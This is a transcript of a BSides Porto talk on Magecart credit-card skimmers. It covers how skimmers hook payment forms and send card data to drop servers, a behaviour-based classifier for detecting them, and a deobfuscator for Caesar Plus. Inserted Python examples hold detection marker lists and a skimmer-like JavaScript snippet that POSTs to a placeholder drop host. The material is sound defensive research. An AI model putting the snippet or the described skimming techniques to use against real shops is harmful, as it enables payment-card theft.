
"Web Skimmers: Seek & Destroy" by Pedro Fortuna

BSides Porto · 34:47 · 71 views · Published 2020-11
About this talk
Talk presented at the 2020 edition of Security BSidesPorto.

Hopefully you are seeing my screen right now, the first slide of my presentation. Yes? Okay. I'm very happy to be here. Those of you who are local might already know me. For those who are not, I've been working in security for more than 15 years, and for the last 10 I decided to focus on application security, specifically on code protection, JavaScript security, and client-side security in general. This will actually be my sixth BSides conference, but it's a very special one because it's in Porto, my hometown, and it's the very first BSides Porto. So thank you to the organization; hopefully it will be

the first of many. I'm also very much interested in anything related to browser security, reverse engineering, and hacking the web in general. As consul already said, I'm co-founder and CTO at Jscrambler. For today I have a somewhat ambitious agenda, so I'll try to move quickly. First I will frame what Magecart is and what Magecart attacks are, then we'll go through web skimmer anatomy. Then we'll get into the main part of the presentation, in which I'll present the work that we have been doing to catch web skimmers. If we have time I'll present Brutus, which I'll talk about in a minute or

so, and finally the Q&A. So, about Magecart attacks. Some of you may have heard about Magecart. The name actually comes from Magento, the e-commerce software. Right now it's no longer only related to Magento; it's affecting any e-commerce website and even other types of websites, but mainly e-commerce. Anything where payment or credit card information is being entered might be targeted by a Magecart attack. A Magecart attack is a type of supply chain attack. It usually targets third-party code that is... Let me just interrupt you: on my screen, at least, I just see the first... all right, okay... slide, so probably it is not

or it's not moving, or is he swapping the screen? Exactly, so let me fix that. Okay, so

sorry to cut your line of thought, but... No, no, no, I'm glad you did. So let's see if this works. If this does not work I will disconnect. I think it's the multiple monitors. No, it's the same. All right, so no worries, I'll fix it.

Just give it a second. Now I only have one monitor, so it must work. How about now? It's okay. Okay, all right. So, like I was saying, a Magecart attack usually targets third-party code that is used in the web application, but in some cases it can also affect first-party code. The Magecart attacks were done initially by a single group, but eventually, as it became very profitable, many groups started doing the same, and now there's a whole cybercriminal scene of people just going after credit card information. It's no wonder it's popular, because it scales well: if you manage to change a JavaScript file, you are basically able to

inject arbitrary code in the page and do whatever you want, and it will affect all the users of that website at once. It's also popular because you don't have to attack the main website, the e-commerce shop. You can go after the weakest link, the third-party vendor whose code is used in the page, and leverage the fact that they might have fewer resources dedicated to security, so it will generally be easier to compromise those third parties than to go after the main website. So it basically works like this: you have third-party code being inserted dynamically into the page, and that code can dynamically add more code, so there's a chaining effect. You can also

have iframes, and those iframes can bring more JavaScript into the mix. If any of these is compromised, it usually means that the whole website is running injected arbitrary JavaScript. Once the attacker collects the data he wants, the skimmer sends the data out, usually through XHR, to a drop server running on some domain, in this case coolestfonts.com, and the attacker is able to collect a large amount of credit card data using this scheme. So you might ask how big this problem is and how often it happens. Right now, almost every week, certainly every month, and these are just a few that I was able

to collect. It's somewhat hard to keep up and know about all of these attacks. It's becoming one of the most common types of attack out there right now. So let's get into the anatomy of a web skimmer. The web skimmer is the payload that gets delivered in a Magecart attack. The one you're seeing is the payload for the Ticketmaster attack, where the attackers were able to compromise a third-party vendor called Inbenta. This is one line of code that has some obfuscation; it's actually not that sophisticated, so you can have a look at the deobfuscated version of it. It basically performs these actions: first it checks if

it's on the correct page, where the payment information is being entered. Then it usually iterates over all the form fields in the page and installs event handlers to listen for clicks on these fields. When that happens, it collects all the data in those fields. It also installs an event handler for the form's submit event, and eventually it sends the data out to the drop server using an XHR POST. It runs every 30 milliseconds in the page, so it's continuously trying to harvest information from the credit card form. You can write a web skimmer by yourself, and attackers can do that, but they usually buy skimmer kits,

and they do it because then they don't need any special skills. They just need access to a compromised e-commerce server, Magento or anything else; once they have access, they just inject the web skimmer in place. If you have a web skimmer kit, you'll have access to a C2 admin panel where you will see the number of accesses and the credit cards that were harvested. A web skimmer kit goes for $250 to $5,000 on the dark web. Usually it's used in spray-and-pray attacks, so they will try to infect as many servers as they can and try to be present in as many payment form pages as they

can, but this is not necessarily true for all attacks; some attacks are very targeted. There are also toolkits like Inter. This is one example; it costs you $1,300. In this case it uses a JavaScript obfuscator called Caesar Plus, which costs around $100 on the dark web. One of the things that it does is fake checkout pages: it takes the user through a fake checkout page, which is the type of attack that you usually see in spray-and-pray campaigns, because the transactions are not successful. The more successful attacks are the ones that are able to skim the

credit card without interrupting the actual purchase, because then it will be harder for people to notice. Before I get into the solution that we are developing, let me very briefly talk about the type of protection that we are putting in place for this type of attack. The talk is not about this at all; this is just a little bit of context. We have a solution with an embedded agent that is inserted into web pages and uses JavaScript virtualization, which works like this: the embedded agent is inserted, then it proceeds to virtualize, that is, to proxy, a lot of DOM methods and web API methods, and

once we do that, all the third-party code is basically running through the proxied versions of these methods, which means that we are doing a sort of man-in-the-middle on the execution of these methods, and we are able to enforce rules and run policies. So what we have is a rule-based behavior control solution. It's meant to prevent Magecart, or formjacking, which is another term for credit card skimming. It checks for event handler hijacking, it does DOM anti-tampering, and it provides data leakage protection. The embedded agent itself is protected with very advanced anti-tampering

technology from Jscrambler. What we are talking about next is something that is combined with this solution, but it's a separate piece: the Magecart classifier. The motivation for this is that, of course, we can mitigate Magecart by applying and enforcing the rules, but sometimes it's hard to know that we are facing a skimmer, that we are dealing with Magecart, because there's a lot of different code out there that might mess with form fields, add its own event handlers, and do a lot of different things. So how can we be sure that we are

dealing with a skimmer, and precisely what kind of skimmer are we talking about? For that we started working on the Magecart classifier. Right now it's a static-code-analysis-based Magecart classifier, and the goal is to answer this question: how likely is it that this file contains a Magecart skimmer? The answer is a score from zero to one, reported as a percentage. First of all, a disclaimer: this is a work in progress. I'm presenting some results, but there are a lot of things to be done on top of what I'm presenting. So, the requirements for the solution: we wanted the solution to be

purely based on behavior, not regular expressions or any hard-coded signatures. There are some solutions on the market that use them, but it's far too easy for attackers to change those signatures and break out of those regexes, because it's easy to transform JavaScript just enough that those signatures no longer trigger. So we are watching for behavior, what the code is actually doing and what functions it is calling, rather than looking at the form of the code as the main technique. It needs to deal with obfuscation, of course, because most of these skimmers are obfuscated. So we need to detect obfuscation, and in some cases we need to automatically deobfuscate the code in

order to have a look at what's underneath and to extract a diverse set of behaviors. And obviously we want it to be as accurate as possible. The architecture in general is like this. We have an obfuscation detection module, which detects whether obfuscation is being used but also which obfuscator was used. Then we have the deobfuscator module, which is pretty self-explanatory. Once we have the underlying code, we have a feature extractor, the module that extracts the behaviors we are looking for. Finally we have a score module, which uses heuristics over feature groups to score the file, and if the percentage is

over 50, we consider that to be a skimmer. Disclaimer: no AI is used. I'm just anticipating this question, but we do have plans to use it in the future. For now this is a simpler but effective first version of the Magecart classifier. These are the groups of features that we are extracting, just as examples. We look at many different dimensions: obfuscation, access to storage, the use of steganography, encoding techniques, network access, and so on. The goal was to be as diverse as possible in order to better characterize the behavior of the web skimmers. So now I'll demonstrate the Magecart classifier through the use

of three skimmer samples. First we'll start with the British Airways skimmer. This skimmer is very simple; you're seeing the entire skimmer in the right-side window. It wasn't even obfuscated. It's just a simple function that hooks into the payment form, serializes all the form fields, and sends everything to this baways.com server. I don't know if you know this, but this Magecart attack corresponded to the biggest GDPR fine in history, roughly 204 million euros. British Airways said that it ran for 15 days, but even that was controversial; some people think that it probably lasted about two months,

and they were able to skim almost 400,000 credit cards, so the impact was huge. In terms of the skimmer, it uses no obfuscation and it does very simple things. So I'm running the Magecart classifier. In order to save time, I pre-recorded the demo, so let me play this; I hope you can see it. The skimmer was inserted into a Modernizr library, at the very bottom of the script. It was actually a first-party breach, so someone from the British Airways team fetched this file and it was already compromised. It was a very severe incident. Next I'll run the classifier, so

the classifier is a CLI tool. It takes as input the file that we want to classify, and it also presents the features that we were able to find. Okay, so running this yields the final score. I'm not sure if you are able to see it, but it's 52, so just barely over the Magecart threshold that we are considering. Because it doesn't use obfuscation and it's very simple, by our heuristics it is barely over the threshold. Nevertheless, we would have picked up this file and probably tried to have a deeper look at it. Skimmer number two is the one that we

saw before, the Ticketmaster Inbenta skimmer. This particular skimmer uses obfuscation. It also uses new techniques like a page location check: it checks if it's in the right place. It handles multi-page checkouts, so it uses cookies to store information as the user progresses through the payment process. The other things are the normal ones: event binding, XHR POST, and target selectors. So we have a new demo. For this particular skimmer we are testing three versions. The first one is a deobfuscated version of the skimmer, so this is after manual deobfuscation of the skimmer,

and as you can see, the final score was 66, and no obfuscation was detected in the features list because it has been previously deobfuscated. But we also ran the classifier on the obfuscated version, which is the one that you'll see next.
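One way to picture why the same skimmer can score differently with and without obfuscation is a weighted sum over detected feature groups, compared against the 50 percent threshold mentioned in the talk. The following is only a minimal sketch under stated assumptions: the feature names and the weights are hypothetical, chosen for illustration, and are not the classifier's real values. It does not reproduce the scores shown in the demo.

```python
# Hypothetical feature names and weights, chosen only for illustration.
# The talk does not disclose the classifier's real features or weights.
WEIGHTS = {
    "page_location_check": 0.15,
    "form_event_binding": 0.20,
    "xhr_post": 0.20,
    "cookie_staging": 0.10,
    "form_serialization": 0.15,
    "obfuscation_detected": 0.20,
}

# The talk treats a file scoring over 50 percent as a skimmer.
SKIMMER_THRESHOLD = 0.5


def score(features):
    """Sum the weights of the detected features into a 0..1 score."""
    detected = set(features)
    unknown = detected.difference(WEIGHTS)
    if unknown:
        raise ValueError(f"unknown features: {sorted(unknown)}")
    return round(sum(WEIGHTS[name] for name in detected), 2)


def is_skimmer(features):
    """Flag the file when its score is strictly above the threshold."""
    return score(features) > SKIMMER_THRESHOLD


# Same behaviours, with and without an obfuscation finding.
deobfuscated = {
    "page_location_check",
    "form_event_binding",
    "xhr_post",
    "cookie_staging",
}
obfuscated = deobfuscated | {"obfuscation_detected"}

print(score(deobfuscated), score(obfuscated))
```

In this sketch the obfuscated variant scores higher than the deobfuscated one simply because one more weighted feature is present, which mirrors the direction of the result in the demo, not its numbers.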

Okay, so right now it is detecting obfuscation, and logically the final score is 81. It's higher because it also detected obfuscation, and that alone is also a sign of a skimmer, not just because we found obfuscation but because of this particular type of obfuscation: some obfuscators are regularly used by skimmers, and obviously we look for those as well. So, the results: the first one, the deobfuscated version, is 66; the obfuscated version containing only the skimmer is 81 percent, and we detected the obfuscation, it used the xanax obfuscator; and finally, if we analyze the full file, the grade was 85 percent,

because finding that just a smaller part of the file is obfuscated and looks like a skimmer is more suspicious, hence the higher score. Finally, we're looking at the Caesar skimmer. It uses a different kind of obfuscation, which you can see on the right: Caesar Plus obfuscation. It also handles multi-page checkouts, but it uses local storage, not cookies, for that. In order to work on this example we actually developed a Caesar Plus deobfuscator, which hopefully, if I have time, I will show you at the end. The score was 86, so it's higher than the previous examples that I've shown you,

mostly because Caesar obfuscation is much more tied to malicious activity, to malware and to web skimmers, than sonic's. sun x is somewhat tied, but there are sometimes legitimate uses of sonics. So if we look at the scores for all the samples that I've shown you, the final score was in increasing order, so the one that is most likely a skimmer is the last one, but all of them were above the 50 threshold that we consider. About testing: we collected 244 unique skimmer samples, so these are real Magecart skimmers, and we also collected JavaScript code from the Alexa top 1000,

which resulted in 11,353 files. We pre-labeled the skimmer samples, ran the classifier over all the JavaScript files, and finally compared the score with the label to see if our estimation was accurate or not. We measured false positives, true positives, false negatives, and true negatives, and these are the results. Right now, using this data set, we managed to be 95 percent accurate, so it was actually pretty good for this data set. I think the reason is mostly connected with the fact that we are collecting a lot of diverse behaviors and not using signatures at all. So the final part of this presentation, and I think I'll have time for that,

is to present Brutus Minus, which is the deobfuscator for Caesar Plus that we have developed. Caesar Plus is available on the dark web for roughly $100, and it's being used for all sorts of malware. Initially we analyzed this obfuscation. It basically has two layers of obfuscation. It uses a number of different string and integer obfuscations; you can see some examples. You have a ternary operator, which is not really hard to digest, so it's very easy. It converts strings to base 34 and uses regex to clean up somewhat obfuscated strings, so it's not that hard to remove this type of construct. It also injects dead code. But the

hardest part is dealing with the first layer. The first layer that you can see here is actually encoded in JavaScript. I called it ciphering, but it's actually not using encryption, it's using encoding. It self-decodes, uses eval to evaluate the result, and after that it gets the underlying code. The underlying code, layer 2, also does a sort of anti-tampering: it uses CRC checks, using reflection, to see whether or not we have removed the first layer. So you have to use some techniques to remove layer 1 without triggering the CRC check in layer 2. Underneath you can

see a lot more number and string obfuscations, a lot more dead code, and so on. So, the final demonstration: running Brutus Minus on this code. This is a sample obfuscated with Caesar Plus, and here I'll run Brutus Minus on this sample. Okay, so I redirected the output to this file, brutus.js, and this is the output. You can see the page location tests. You can still see some dead code lying around, but it's not really preventing us from understanding what's happening. You see the querySelector calls and the addEventListener calls, so it pretty much solves the problem for us in terms of classification, because we are able to do

static analysis on the result without any issue whatsoever. You also see a lot of access to local storage, and you see the drop server address. There are a lot of things that you can see here, but generally we have everything pretty wide open to do our classification. All right, so, wrapping up. Web skimmers are increasingly sophisticated. There's a lot I couldn't fit into this presentation: some skimmers are using bot detection, some are using steganography, some are sending data out as images. It's kind of a cat-and-mouse game, and the only way to approach this problem is by using behavior-based defenses, which is

our approach. But it's not enough to block and control the behavior and enforce the behavior that one wants; it's also important to know what we are dealing with, hence the work on this skimmer, or Magecart, classifier. We decided to build one, and as we presented, it can work through layers of obfuscated code. The results right now are very promising. You can either use the results straight out of this classifier or use it as a way to select candidates for deeper analysis, even manual analysis if you want. It uses static code analysis, which scales very well: we are not running engines, we are not running browsers,

so we don't have to deal with all of that confusion. We just need to run it against a large set of JavaScript files and look at the results. As a bonus, we presented Brutus Minus, our Caesar Plus deobfuscator. And that's it for now. We'll continue to work on this Magecart classifier, and perhaps we'll see each other again in a follow-up presentation where we'll have more things to show. Thank you. Thank you, Pedro, thank you for your talk. It's always good to know a little bit more about JavaScript attacks and how they appear, as we are exposed daily to those problems. Everyone buys things on the internet, so those

attacks are on our list too. There are some questions. Someone did not understand 100 percent how they inject the malicious JavaScript, so if you can explain a little bit more. And another question, coming from jean-paulo, asks if you are considering using different weights to analyze the different features that your product has, or if you are already doing that. All right. The injection of the JavaScript is usually done by compromising a server. Let's say it's a Magento server: usually what they do is very unsophisticated attacks, like brute-forcing the admin password or leveraging the fact that it is not running the latest version of the software and has

known vulnerabilities. So the breach actually happens before the Magecart attack. Anyway, in spray-and-pray attacks they are usually not after a specific server; they just try to reach as many servers as they can, inject the skimmer into all targets at once, and wait for the results. Second question, different weights: we are already using different weights for the different features. Right now we are not adjusting these weights automatically; this is one of the things that we'll work on using machine learning. But for now it's working pretty well, at least on the data set that we have

been testing. Thank you for the answers. Another small question: is the remote scan that you did of the top 1000 sites available, on GitHub or so? I don't think so, it's not available, but it's something that we can easily share because it's not very complicated code. I'm sure you will be able to find this type of code on GitHub, because there are lots of different tests that are done against the Alexa top 1000 or 10,000, etc. But after the talk, talk with me and we'll give you access to it. Okay, thank you. Thank you for your

presentation again and for your time.
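The static, execution-free feature extraction described in the talk can be illustrated with a small sketch. Everything here is an assumption made for illustration: the behaviour names, the marker lists, and the `extract_features` and `scan` helpers are hypothetical and are not the speaker's implementation. A real tool would more plausibly walk a parsed syntax tree of deobfuscated code; plain substring checks are used here only to keep the example short.

```python
# Hypothetical mapping from behaviour groups to JavaScript API names.
# These groups loosely follow the dimensions named in the talk
# (network access, storage access, event binding, and so on).
BEHAVIOUR_MARKERS = {
    "network_access": ("XMLHttpRequest", "fetch(", "sendBeacon"),
    "event_binding": ("addEventListener", "onsubmit", "onclick"),
    "dom_form_access": ("querySelector", "getElementsByTagName", "document.forms"),
    "storage_access": ("localStorage", "sessionStorage", "document.cookie"),
    "page_location_check": ("location.href", "location.pathname"),
    "dynamic_code": ("eval(", "new Function("),
}


def extract_features(source):
    """Return the behaviour groups whose markers appear in the source text.

    The source is only read as text and is never executed.
    """
    return {
        name
        for name, markers in BEHAVIOUR_MARKERS.items()
        if any(marker in source for marker in markers)
    }


def scan(files):
    """Map each file path to the behaviours found in its source."""
    return {path: extract_features(source) for path, source in files.items()}


# Illustrative inputs; drop.example is a placeholder domain.
suspicious = (
    "if (location.href.indexOf('checkout') > -1) {"
    " document.querySelector('form').addEventListener('submit', function () {"
    " var x = new XMLHttpRequest();"
    " x.open('POST', 'https://drop.example/c');"
    " x.send(localStorage.getItem('d')); }); }"
)
benign = "function add(a, b) { return a + b; }"

report = scan({"checkout.js": suspicious, "math.js": benign})
for path, features in report.items():
    print(path, sorted(features))
```

Because nothing is executed, a scan like this can be run over a large set of JavaScript files without a browser or a JavaScript engine, which is the scaling property the talk attributes to static analysis.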